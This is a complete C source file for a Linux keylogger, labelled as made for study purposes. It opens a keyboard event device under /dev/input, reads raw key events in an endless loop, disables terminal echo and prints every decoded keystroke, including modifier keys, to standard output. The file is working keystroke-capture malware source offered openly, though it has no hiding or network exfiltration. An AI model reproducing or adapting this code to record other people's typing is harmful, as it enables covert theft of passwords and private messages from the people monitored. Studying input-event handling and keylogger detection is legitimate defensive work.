/*
*
    *** Created only for study purposes.
    * LICENSE: GPLv2
        This file is part of keylogger.

        keylogger is free software; you can redistribute it and/or modify it under the
        terms of the GNU General Public License 2 as published by the Free Software
        Foundation.

        keylogger is distributed in the hope that it will be useful, but WITHOUT ANY
        WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
        A PARTICULAR PURPOSE. See the GNU General Public License for more details.

        You should have received a copy of the GNU General Public License along with
        this program. If not, see https://www.gnu.org/licenses/.
*
*/

#include <errno.h>
#include <fcntl.h>
#include <linux/input.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <termios.h>
#include <unistd.h>

#include "../include/util.h"

bool caps = false;

int main(int argc, char **argv)
{
    if (argc != 2)
    {
        fprintf(stderr, "Usage: %s kbdeventfile\n", argv[0]);
        fprintf(stderr, "\tKeyboard event files can be found at /dev/input/by-path\n");
        return EXIT_FAILURE;
    }
    int fd = open(argv[1], O_RDONLY, 0);
    if (fd == -1) {
        perror("open()");
        return EXIT_FAILURE;
    }

    struct lkup_table lk_table;
    memset(&lk_table, 0, sizeof(lk_table));
    init_lookup_table(&lk_table);

    printf("Keylogger active... \n");
    struct termios tio;

    tcgetattr(STDIN_FILENO, &tio);
    struct termios noecho = tio;

    // Disable echo.
    noecho.c_lflag ^= ECHO;
    tcsetattr(STDIN_FILENO, TCSANOW, &noecho);

    struct input_event in_e;
    // Continuously read the event file generated by the kernel.
    while (true) {
        fflush(stdout);
        read(fd, &(in_e), sizeof(in_e));
        // Accept events triggered due to a fresh key press or duplication.
        if (in_e.value == 1 || in_e.value == 2) {
            // Accept only events that are trigged due to a key press.
                // Key events have codes of type (KEY_X|BTN_X).
            if (in_e.type == EV_KEY) {
                // Numbers.
                if (in_e.code >=2 && in_e.code <= 11) {
                    if (in_e.code == 11)
                        printf("0");
                    else
                        printf("%d", in_e.code - 1);
                    continue;
                }
                switch (in_e.code) {
                    case KEY_ENTER:
                            printf("\n");
                            continue;
                    case KEY_SPACE:
                            printf(" ");
                            continue;
                    case KEY_TAB:
                            printf("\t");
                            continue;
                    case KEY_CAPSLOCK:
                            // Toggle caps lock.
                            caps = !caps;
                            continue;
                    case KEY_BACKSPACE:
                            printf("[back]");
                            continue;
                    case KEY_DELETE:
                            printf("[del]");
                            continue;
                    case KEY_FN:
                            printf("[fn]");
                            continue;
                    case KEY_ESC:
                            printf("[esc]");
                            continue;
                    case KEY_LEFTCTRL:
                    case KEY_RIGHTCTRL:
                            printf("[ctrl]");
                            continue;
                    case KEY_LEFTSHIFT:
                    case KEY_RIGHTSHIFT:
                            printf("[shift]");
                            continue;
                    case KEY_LEFTMETA:
                    case KEY_RIGHTMETA:
                            printf("[meta/super]");
                            continue;
                    case KEY_LEFTALT:
                    case KEY_RIGHTALT:
                            printf("[alt]");
                            continue;
                }
                // Characters in the lookup table.
                int ch = find(lk_table.lkup_table_nodes, lk_table.c_entries, in_e.code, caps);
                if (ch == -1)
                    printf("`uk%d`", in_e.code);
                else
                    printf("%c", ch);
            }
        }
    }

    // Restore terminal to its default attributes.
    tcsetattr(STDIN_FILENO, TCSANOW, &tio);

    close(fd);
    free_lkup_table(&lk_table);
    return EXIT_SUCCESS;
}
